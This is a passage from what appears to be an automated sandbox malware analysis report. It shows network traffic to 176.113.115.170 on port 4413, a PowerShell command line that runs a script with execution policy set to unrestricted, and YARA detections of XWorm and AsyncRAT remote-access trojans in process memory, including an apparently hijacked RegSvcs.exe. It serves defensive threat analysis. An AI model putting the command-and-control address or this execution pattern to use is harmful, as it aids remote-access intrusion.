                                          Jan 11, 2025 10:06:52.103925943 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:52.109277964 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:52.317425966 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:52.319099903 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:52.324027061 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.275779009 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:53.281081915 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.307058096 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:53.312374115 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.489178896 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.490802050 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:53.495716095 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.609906912 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:53.611321926 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:53.616221905 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:55.150677919 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:55.156070948 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:55.380815029 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:06:55.382570028 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:06:55.387569904 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:00.371218920 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:00.376627922 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:00.584845066 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:00.587024927 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:00.591989994 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:03.791402102 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:03.796681881 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:03.916507959 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:03.921680927 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:03.932029963 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:03.936887980 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:03.963228941 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:03.968179941 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:03.978842020 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:03.983760118 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.006405115 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.007679939 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.059721947 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.133440018 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.134457111 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.146152973 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.250901937 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.255218029 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.260149956 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.371023893 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.375195980 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.380100012 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.383325100 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.388139963 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.605058908 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.610132933 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.831267118 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:04.833348036 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:04.838221073 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:10.377590895 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:10.382812023 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:10.590895891 CET441349718176.113.115.170192.168.2.6
                                          Jan 11, 2025 10:07:10.591417074 CET497184413192.168.2.6176.113.115.170
                                          Jan 11, 2025 10:07:10.596385956 CET441349718176.113.115.170192.168.2.6
UDP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Jan 11, 2025 10:03:34.860136986 CET  53           63290      162.159.36.2  192.168.2.6
Jan 11, 2025 10:03:35.338906050 CET  62988        53         192.168.2.6   1.1.1.1
Jan 11, 2025 10:03:35.347450972 CET  53           62988      1.1.1.1       192.168.2.6

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                      Type                  Class        DNS over HTTPS
Jan 11, 2025 10:03:35.338906050 CET  192.168.2.6  1.1.1.1  0x8c6     Standard query (0)  18.31.95.13.in-addr.arpa  PTR (Pointer record)  IN (0x0001)  false

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                      CName  Address  Type                  Class        DNS over HTTPS
Jan 11, 2025 10:03:35.347450972 CET  1.1.1.1    192.168.2.6  0x8c6     Name error (3)  18.31.95.13.in-addr.arpa  none   none     PTR (Pointer record)  IN (0x0001)  false
Target ID: 0
Start time: 04:03:02
Start date: 11/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation: high
Has exited: true

Target ID: 2
Start time: 04:03:02
Start date: 11/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 04:03:05
Start date: 11/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase: 0x940000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin